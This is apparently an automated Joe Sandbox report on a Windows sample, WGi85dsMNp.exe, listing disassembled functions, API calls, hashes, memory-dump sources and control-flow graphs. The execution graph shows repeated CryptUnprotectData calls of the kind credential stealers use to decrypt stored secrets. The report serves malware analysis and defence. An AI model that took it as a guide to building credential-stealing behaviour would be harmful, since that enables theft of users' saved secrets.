                                                                                                      • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                      • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                      • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WGi85dsMNp.exe,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405D0F
                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WGi85dsMNp.exe,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405D1F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharPrevlstrlen
                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                      • API String ID: 2709904686-1246513382
                                                                                                      • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                      • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                                                                      • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                      • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6F94116A
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F9411C7
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F9411D9
                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F941203
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$Alloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1780285237-0
                                                                                                      • Opcode ID: 02f0a6755b8376bf55fc62c7f6ae3dd83f741eac300ad7199fd5ed793762ef75
                                                                                                      • Instruction ID: 58f0c395c88be36f5dbbf19ebe15aa0c5fa519c253666cc377b24cdc6b5f68c1
                                                                                                      • Opcode Fuzzy Hash: 02f0a6755b8376bf55fc62c7f6ae3dd83f741eac300ad7199fd5ed793762ef75
                                                                                                      • Instruction Fuzzy Hash: DE3194B55042019FEB229FBCC945A7577E8FB7B320700061AE848D72D5E735E8B58F60
                                                                                                      APIs
                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                      • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 190613189-0
                                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                      • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                      • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:12.1%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:2.6%
                                                                                                      Total number of Nodes:272
                                                                                                      Total number of Limit Nodes:14
                                                                                                      execution_graph 39479 ad030 39480 ad048 39479->39480 39481 ad0a2 39480->39481 39487 35df02c8 39480->39487 39492 35df03f0 39480->39492 39495 35df1bc0 39480->39495 39500 35df1bd0 39480->39500 39505 35df02b7 39480->39505 39488 35df02ee 39487->39488 39490 35df1bd0 3 API calls 39488->39490 39491 35df1bc0 3 API calls 39488->39491 39489 35df030f 39489->39481 39490->39489 39491->39489 39493 35df0407 39492->39493 39510 35df0841 39492->39510 39493->39481 39496 35df1bd0 39495->39496 39497 35df1c2f 39496->39497 39553 35df1d58 39496->39553 39563 35df1d48 39496->39563 39501 35df1bfd 39500->39501 39502 35df1c2f 39501->39502 39503 35df1d58 3 API calls 39501->39503 39504 35df1d48 3 API calls 39501->39504 39503->39502 39504->39502 39506 35df02ee 39505->39506 39508 35df1bd0 3 API calls 39506->39508 39509 35df1bc0 3 API calls 39506->39509 39507 35df030f 39507->39481 39508->39507 39509->39507 39512 35df0856 39510->39512 39513 35df0938 39510->39513 39512->39493 39514 35df0948 39513->39514 39515 35df0965 39514->39515 39518 35df0980 39514->39518 39530 35df0970 39514->39530 39515->39512 39519 35df09c6 GetCurrentProcess 39518->39519 39521 35df0a18 GetCurrentThread 39519->39521 39522 35df0a11 39519->39522 39523 35df0a4e 39521->39523 39524 35df0a55 GetCurrentProcess 39521->39524 39522->39521 39523->39524 39525 35df0a8b 39524->39525 39542 35df0b4f 39525->39542 39546 35df0f31 39525->39546 39526 35df0ab3 GetCurrentThreadId 39527 35df0ae4 39526->39527 39527->39515 39531 35df0980 GetCurrentProcess 39530->39531 39533 35df0a18 GetCurrentThread 39531->39533 39535 35df0a11 39531->39535 39534 35df0a55 GetCurrentProcess 39533->39534 39537 35df0a4e 39533->39537 39536 35df0a8b 39534->39536 39535->39533 39540 35df0b4f 2 API calls 39536->39540 39541 35df0f31 39536->39541 39537->39534 39538 35df0ab3 GetCurrentThreadId 39539 35df0ae4 39538->39539 39539->39515 39540->39538 39541->39538 39548 35df0bc8 DuplicateHandle 39542->39548 39550 35df0bc0 39542->39550 39543 35df0b8e 39543->39526 39547 35df0f3a 39546->39547 39547->39526 39549 35df0c5e 39548->39549 39549->39543 39551 35df0bc8 DuplicateHandle 39550->39551 39552 35df0c5e 39551->39552 39552->39543 39554 35df1d66 39553->39554 39555 35df1d93 39553->39555 39556 35df1d6e 39554->39556 39577 35df1dc0 39554->39577 39581 35df1db1 39554->39581 39555->39554 39557 35df1d98 39555->39557 39556->39497 39573 35df17d0 39557->39573 39559 35df1da4 39559->39497 39560 35df1dac 39560->39497 39564 35df1d58 39563->39564 39565 35df1d66 39564->39565 39566 35df1d98 39564->39566 39570 35df1d6e 39565->39570 39571 35df1db1 CallWindowProcW 39565->39571 39572 35df1dc0 CallWindowProcW 39565->39572 39567 35df17d0 GetCurrentThreadId 39566->39567 39568 35df1da4 39567->39568 39568->39497 39569 35df1dac 39569->39497 39570->39497 39571->39569 39572->39569 39574 35df17db 39573->39574 39585 35df181c 39574->39585 39576 35df22f5 39576->39559 39578 35df1e02 39577->39578 39580 35df1e09 39577->39580 39579 35df1e5a CallWindowProcW 39578->39579 39578->39580 39579->39580 39580->39560 39582 35df1dba 39581->39582 39584 35df1e09 39581->39584 39583 35df1e5a CallWindowProcW 39582->39583 39582->39584 39583->39584 39584->39560 39587 35df1827 39585->39587 39586 35df248b 39586->39576 39587->39586 39588 35df2461 GetCurrentThreadId 39587->39588 39588->39586 39589 16b158 39590 16b174 39589->39590 39599 354b0198 39590->39599 39604 354b0191 39590->39604 39591 16b1a3 39609 35a9bd48 39591->39609 39600 354b01a4 39599->39600 39625 354bc64b 39600->39625 39629 354bc638 39600->39629 39601 354b01da 39601->39591 39605 354b0198 39604->39605 39607 354bc64b CryptUnprotectData 39605->39607 39608 354bc638 CryptUnprotectData 39605->39608 39606 354b01da 39606->39591 39607->39606 39608->39606 39610 35a9bd54 39609->39610 39661 35a9bd98 39610->39661 39613 35df2720 39614 35df2730 39613->39614 39615 35df0938 10 API calls 39614->39615 39616 35df2746 39615->39616 39728 35df188c 39616->39728 39619 35df2730 39620 35df273f 39619->39620 39621 35df0938 10 API calls 39620->39621 39622 35df2746 39621->39622 39623 35df188c 14 API calls 39622->39623 39624 16b1b1 39623->39624 39627 354bc66a 39625->39627 39626 354bcaf9 39626->39601 39627->39626 39633 354bcf01 39627->39633 39631 354bc631 39629->39631 39630 354bcaf9 39630->39601 39631->39629 39631->39630 39632 354bcf01 CryptUnprotectData 39631->39632 39632->39631 39634 354bcf10 39633->39634 39638 354bd540 39634->39638 39646 354bd550 39634->39646 39635 354bcf80 39635->39627 39639 354bd550 39638->39639 39640 354bd629 39639->39640 39643 354bd540 CryptUnprotectData 39639->39643 39644 354bd550 CryptUnprotectData 39639->39644 39654 354bd730 39639->39654 39658 354bd1ec 39640->39658 39643->39640 39644->39640 39647 354bd575 39646->39647 39648 354bd629 39646->39648 39647->39648 39651 354bd540 CryptUnprotectData 39647->39651 39652 354bd550 CryptUnprotectData 39647->39652 39653 354bd730 CryptUnprotectData 39647->39653 39649 354bd1ec CryptUnprotectData 39648->39649 39650 354bd7f5 39649->39650 39650->39635 39651->39648 39652->39648 39653->39648 39655 354bd739 39654->39655 39656 354bd1ec CryptUnprotectData 39655->39656 39657 354bd7f5 39656->39657 39657->39640 39659 354bd9e0 CryptUnprotectData 39658->39659 39660 354bd7f5 39659->39660 39660->39635 39662 35a9bdb4 39661->39662 39666 35a9ce60 39662->39666 39670 35a9ce50 39662->39670 39663 16b1aa 39663->39613 39663->39619 39667 35a9ce7c 39666->39667 39674 35a994b4 39667->39674 39669 35a9ce9b 39669->39663 39671 35a9ce60 39670->39671 39672 35a994b4 3 API calls 39671->39672 39673 35a9ce9b 39672->39673 39673->39663 39675 35a994bf 39674->39675 39676 35a9cf4f 39675->39676 39679 35a9cf59 39675->39679 39683 35a9cf68 39675->39683 39676->39669 39680 35a9cf67 39679->39680 39681 35a9d021 39680->39681 39687 35a995e8 39680->39687 39681->39681 39685 35a9cf7f 39683->39685 39684 35a9d021 39684->39684 39685->39684 39686 35a995e8 3 API calls 39685->39686 39686->39684 39688 35a995f3 39687->39688 39690 35a9ec47 39688->39690 39691 35a9e7f4 39688->39691 39690->39681 39693 35a9e7ff 39691->39693 39692 35a9f111 39692->39690 39693->39692 39696 35a9faa1 39693->39696 39701 35a9fab0 39693->39701 39697 35a9fadb 39696->39697 39698 35a9fb8a 39697->39698 39706 35df00c0 39697->39706 39711 35df00b0 39697->39711 39703 35a9fadb 39701->39703 39702 35a9fb8a 39702->39702 39703->39702 39704 35df00c0 3 API calls 39703->39704 39705 35df00b0 3 API calls 39703->39705 39704->39702 39705->39702 39710 35df00b0 3 API calls 39706->39710 39720 35df0104 39706->39720 39724 35df0110 39706->39724 39707 35df00f5 39707->39698 39710->39707 39712 35df00fd CreateWindowExW 39711->39712 39713 35df00ba 39711->39713 39716 35df0234 39712->39716 39717 35df0104 CreateWindowExW 39713->39717 39718 35df0110 CreateWindowExW 39713->39718 39719 35df00b0 2 API calls 39713->39719 39714 35df00f5 39714->39698 39717->39714 39718->39714 39719->39714 39721 35df0178 CreateWindowExW 39720->39721 39723 35df0234 39721->39723 39723->39723 39725 35df0178 CreateWindowExW 39724->39725 39727 35df0234 39725->39727 39727->39727 39729 35df1897 39728->39729 39731 35df2866 39729->39731 39732 35df1934 39729->39732 39737 35df193f 39732->39737 39733 35df2e79 39734 35df2ea9 39733->39734 39736 35df2ac4 11 API calls 39733->39736 39738 35df2ec1 39734->39738 39745 35df2ac4 39734->39745 39736->39734 39737->39733 39737->39738 39740 35df3e40 39737->39740 39738->39729 39741 35df3e61 39740->39741 39742 35df3e85 39741->39742 39751 35df3fe0 39741->39751 39757 35df3ff0 39741->39757 39742->39733 39746 35df2acf 39745->39746 39747 35df0938 10 API calls 39746->39747 39750 35dfd0a1 39746->39750 39748 35dfd0bb 39747->39748 39799 35dfc544 39748->39799 39750->39738 39752 35df3ff0 39751->39752 39753 35df0938 10 API calls 39752->39753 39754 35df402b 39753->39754 39755 35df4036 39754->39755 39763 35df2bec 39754->39763 39755->39742 39758 35df3ffd 39757->39758 39759 35df0938 10 API calls 39758->39759 39760 35df402b 39759->39760 39761 35df4036 39760->39761 39762 35df2bec 13 API calls 39760->39762 39761->39742 39762->39761 39764 35df2bf7 39763->39764 39766 35df40a8 39764->39766 39767 35df2c20 39764->39767 39768 35df2c2b 39767->39768 39782 35df2c30 39768->39782 39771 35df4526 39772 35df40f8 CreateWindowExW CreateWindowExW CreateWindowExW 39771->39772 39773 35df4540 39772->39773 39774 35df4108 CreateWindowExW CreateWindowExW CreateWindowExW 39773->39774 39775 35df4547 39774->39775 39777 35df91d8 CreateWindowExW CreateWindowExW CreateWindowExW 39775->39777 39778 35df9067 CreateWindowExW CreateWindowExW CreateWindowExW 39775->39778 39779 35df91f0 CreateWindowExW CreateWindowExW CreateWindowExW 39775->39779 39780 35df8400 CreateWindowExW CreateWindowExW CreateWindowExW 39775->39780 39776 35df4551 39776->39766 39777->39776 39778->39776 39779->39776 39780->39776 39785 35df2c3b 39782->39785 39783 35df4517 39786 35df75cd 39783->39786 39784 35df3e40 13 API calls 39784->39783 39785->39783 39785->39784 39789 35df75ea 39786->39789 39787 35df7700 39788 35df76d3 39789->39787 39791 35df8060 39789->39791 39792 35df807d 39791->39792 39794 35df80c1 39792->39794 39795 35df4108 39792->39795 39794->39788 39796 35df4113 39795->39796 39797 35df8400 CreateWindowExW CreateWindowExW CreateWindowExW 39796->39797 39798 35df901f 39797->39798 39798->39794 39801 35dfc54f 39799->39801 39800 35dfd3bb 39800->39750 39801->39800 39803 35dfc560 39801->39803 39804 35dfd3f0 OleInitialize 39803->39804 39805 35dfd454 39804->39805 39805->39800 39806 35df20c0 39809 35df20ed 39806->39809 39807 35df213c 39807->39807 39809->39807 39810 35df17fc 39809->39810 39811 35df1807 39810->39811 39812 35df17d0 GetCurrentThreadId 39811->39812 39813 35df229c 39812->39813 39816 35a995e8 3 API calls 39813->39816 39817 35a9ec19 39813->39817 39814 35df22a5 39814->39807 39816->39814 39818 35a9ec28 39817->39818 39819 35a9e7f4 3 API calls 39818->39819 39820 35a9ec47 39818->39820 39819->39820 39820->39814 39821 35df2020 SetTimer 39822 35df208c 39821->39822

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 320 164328-164368 322 16436f-16444c call 163168 call 162c88 320->322 323 16436a 320->323 333 164453-164471 322->333 334 16444e 322->334 323->322 364 164474 call 164664 333->364 365 164474 call 164620 333->365 334->333 335 16447a-164485 336 164487 335->336 337 16448c-164490 335->337 336->337 338 164495-16449c 337->338 339 164492-164493 337->339 341 1644a3-1644b1 338->341 342 16449e 338->342 340 1644b4-1644f8 339->340 346 16455e-164575 340->346 341->340 342->341 348 164577-16459c 346->348 349 1644fa-164510 346->349 355 1645b4 348->355 356 16459e-1645b3 348->356 353 164512-16451e 349->353 354 16453a 349->354 357 164520-164526 353->357 358 164528-16452e 353->358 359 164540-16455d 354->359 356->355 360 164538 357->360 358->360 359->346 360->359 364->335 365->335
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                      • API String ID: 0-1229222154
                                                                                                      • Opcode ID: b0b5c59cea056ea7cae939b86f2c98d6c110d7e3dd192d775af1b817efe8df15
                                                                                                      • Instruction ID: c4dad6b83f72fe2a52a724b3d18b52f5a54b0f8dc450b58345a0820d680a20c1
                                                                                                      • Opcode Fuzzy Hash: b0b5c59cea056ea7cae939b86f2c98d6c110d7e3dd192d775af1b817efe8df15
                                                                                                      • Instruction Fuzzy Hash: D191D474E00258DFDB18DFA9D994A9DBBF2BF89300F14C06AE809AB365DB349945CF50
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (o]q$4']q$4']q$4']q
                                                                                                      • API String ID: 0-875651895
                                                                                                      • Opcode ID: b9e99245ff28855bf87ff1970986bfe47e38a47e6d0e5ed36cd4888a702d062f
                                                                                                      • Instruction ID: c990244fbd0056e730567a61978df16ab3c97fa61deb78429572c325c66b1393
                                                                                                      • Opcode Fuzzy Hash: b9e99245ff28855bf87ff1970986bfe47e38a47e6d0e5ed36cd4888a702d062f
                                                                                                      • Instruction Fuzzy Hash: B0A28F70A04209DFCB15CFA8C994AAEBBF6BF88310F158569E405DB361DB34ED91CB91

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 739 165f90-165fc6 866 165fc8 call 165f90 739->866 867 165fc8 call 1660e0 739->867 740 165fce-165fd4 741 165fd6-165fda 740->741 742 166024-166028 740->742 745 165fdc-165fe1 741->745 746 165fe9-165ff0 741->746 743 16603f-166053 742->743 744 16602a-166039 742->744 863 166055 call 168da0 743->863 864 166055 call 1690a8 743->864 747 166065-16606f 744->747 748 16603b-16603d 744->748 745->746 749 1660c6-166103 746->749 750 165ff6-165ffd 746->750 753 166071-166077 747->753 754 166079-16607d 747->754 752 16605b-166062 748->752 761 166105-16610b 749->761 762 16610e-16612e 749->762 750->742 751 165fff-166003 750->751 755 166005-16600a 751->755 756 166012-166019 751->756 757 166085-1660bf 753->757 754->757 759 16607f 754->759 755->756 756->749 760 16601f-166022 756->760 757->749 759->757 760->752 761->762 767 166135-16613c 762->767 768 166130 762->768 771 16613e-166149 767->771 770 1664c4-1664cd 768->770 772 1664d5-1664fe 771->772 773 16614f-166162 771->773 778 166164-166172 773->778 779 166178-166193 773->779 778->779 784 16644c-166453 778->784 782 1661b7-1661ba 779->782 783 166195-16619b 779->783 788 166314-16631a 782->788 789 1661c0-1661c3 782->789 785 1661a4-1661a7 783->785 786 16619d 783->786 784->770 787 166455-166457 784->787 791 1661da-1661e0 785->791 792 1661a9-1661ac 785->792 786->785 786->788 790 166406-166409 786->790 786->791 793 166466-16646c 787->793 794 166459-16645e 787->794 788->790 795 166320-166325 788->795 789->788 796 1661c9-1661cf 789->796 801 1664d0 790->801 802 16640f-166415 790->802 803 1661e6-1661e8 791->803 804 1661e2-1661e4 791->804 797 166246-16624c 792->797 798 1661b2 792->798 793->772 799 16646e-166473 793->799 794->793 795->790 796->788 800 1661d5 796->800 797->790 807 166252-166258 797->807 798->790 805 166475-16647a 799->805 806 1664b8-1664bb 799->806 800->790 801->772 808 166417-16641f 802->808 809 16643a-16643e 802->809 810 1661f2-1661fb 803->810 804->810 805->801 813 16647c 805->813 806->801 812 1664bd-1664c2 806->812 814 16625e-166260 807->814 815 16625a-16625c 807->815 808->772 816 166425-166434 808->816 809->784 811 166440-166446 809->811 817 16620e-166236 810->817 818 1661fd-166208 810->818 811->771 811->784 812->770 812->787 819 166483-166488 813->819 820 16626a-166281 814->820 815->820 816->779 816->809 838 16623c-166241 817->838 839 16632a-166360 817->839 818->790 818->817 823 1664aa-1664ac 819->823 824 16648a-16648c 819->824 830 166283-16629c 820->830 831 1662ac-1662d3 820->831 823->801 827 1664ae-1664b1 823->827 828 16648e-166493 824->828 829 16649b-1664a1 824->829 827->806 828->829 829->772 833 1664a3-1664a8 829->833 830->839 842 1662a2-1662a7 830->842 831->801 844 1662d9-1662dc 831->844 833->823 834 16647e-166481 833->834 834->801 834->819 838->839 845 166362-166366 839->845 846 16636d-166375 839->846 842->839 844->801 847 1662e2-16630b 844->847 848 166385-166389 845->848 849 166368-16636b 845->849 846->801 850 16637b-166380 846->850 847->839 862 16630d-166312 847->862 851 16638b-166391 848->851 852 1663a8-1663ac 848->852 849->846 849->848 850->790 851->852 854 166393-16639b 851->854 855 1663b6-1663d5 call 1666b8 852->855 856 1663ae-1663b4 852->856 854->801 857 1663a1-1663a6 854->857 859 1663db-1663df 855->859 856->855 856->859 857->790 859->790 860 1663e1-1663fd 859->860 860->790 862->839 863->752 864->752 866->740 867->740
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (o]q$(o]q$,aq$,aq
                                                                                                      • API String ID: 0-1947289240
                                                                                                      • Opcode ID: c5469644ac7a50e428e1f50abbf936cd00899177ec13b74ee3091fbe6811c494
                                                                                                      • Instruction ID: 090f401a54fa3915b2cf66480ce639e1cfbee592abc18d7bd57d6592966a29a5
                                                                                                      • Opcode Fuzzy Hash: c5469644ac7a50e428e1f50abbf936cd00899177ec13b74ee3091fbe6811c494
                                                                                                      • Instruction Fuzzy Hash: D8024D31A00219DFCB15CFA9CD94AAEBBF6FF89314F15806AE805AB261DB30DD55CB50
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Te]q
                                                                                                      • API String ID: 0-52440209
                                                                                                      • Opcode ID: b558c348e5adb761a24b229ebcca5b379b32c2048ace9d52a61f1ff072471c84
                                                                                                      • Instruction ID: 21a83d25077572c4979a5a7bc1e4ea917cd7681f141d92209aae26e54691df23
                                                                                                      • Opcode Fuzzy Hash: b558c348e5adb761a24b229ebcca5b379b32c2048ace9d52a61f1ff072471c84
                                                                                                      • Instruction Fuzzy Hash: D772D374A01268CFDB25EF64D994BADB7B6FF89300F1084A9D80967365CB359E82CF44
                                                                                                      APIs
                                                                                                      • CryptUnprotectData.CRYPT32(000000A8,?,00000000,?,?,?,?), ref: 354BDA45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptDataUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 834300711-0
                                                                                                      • Opcode ID: 8080b0685b651fc4cab27d7d7d896c6bac081e99c9c74aecb1c3768e0bea46e4
                                                                                                      • Instruction ID: 05595f77d70b7269784b1301a9ba72fe14f0d1e4bdf1c9796f04280629c2bdb9
                                                                                                      • Opcode Fuzzy Hash: 8080b0685b651fc4cab27d7d7d896c6bac081e99c9c74aecb1c3768e0bea46e4
                                                                                                      • Instruction Fuzzy Hash: C81156B6800249AFDB10CF99C845BEEBFF4EF48320F148459E659A7210C379A950CFA1
                                                                                                      APIs
                                                                                                      • CryptUnprotectData.CRYPT32(000000A8,?,00000000,?,?,?,?), ref: 354BDA45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptDataUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 834300711-0
                                                                                                      • Opcode ID: 6f9ec0e0f649f5ae5aacdeecbcd8cddc4012ee5d8a9c3ae170e076d2bda9ce87
                                                                                                      • Instruction ID: 571b708f77e328dba5422824a097c6d8e499e607c6050fa933ddb7e9be7dda32
                                                                                                      • Opcode Fuzzy Hash: 6f9ec0e0f649f5ae5aacdeecbcd8cddc4012ee5d8a9c3ae170e076d2bda9ce87
                                                                                                      • Instruction Fuzzy Hash: 3E1137B68002499FDB10CF99C944BDEBFF4EF48320F148459E659A7210C779A550DFA5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3943097874.00000000354B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 354B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_354b0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4
                                                                                                      • API String ID: 0-967804232
                                                                                                      • Opcode ID: a1eea5043a421090c052c3b6c339913acfa4815cad248d9c02d4a1ad56b436c5
                                                                                                      • Instruction ID: 579e8671b05eee1803564839a42de822cce8a22422b4a9ace4143b2f019d90c8
                                                                                                      • Opcode Fuzzy Hash: a1eea5043a421090c052c3b6c339913acfa4815cad248d9c02d4a1ad56b436c5
                                                                                                      • Instruction Fuzzy Hash: 54A1F474E002088FEB14DFA9C544BDDBBB1FF88315F20826AE449A7291DB749985CF55
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0^L5
                                                                                                      • API String ID: 0-3174228013
                                                                                                      • Opcode ID: e9175eef24feba469106ec13f2d52f22be11fb17fe6cfbeb86d76c9c9ef81322
                                                                                                      • Instruction ID: 56c901db8b493941bd7fd82d4d960b83d998a34b57a1b1e39d9a5c8c842ce204
                                                                                                      • Opcode Fuzzy Hash: e9175eef24feba469106ec13f2d52f22be11fb17fe6cfbeb86d76c9c9ef81322
                                                                                                      • Instruction Fuzzy Hash: 28A18174E052289FEB18CF6AC944BDDBBF2BF89300F14C0AAD409A7255DB745A85CF51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
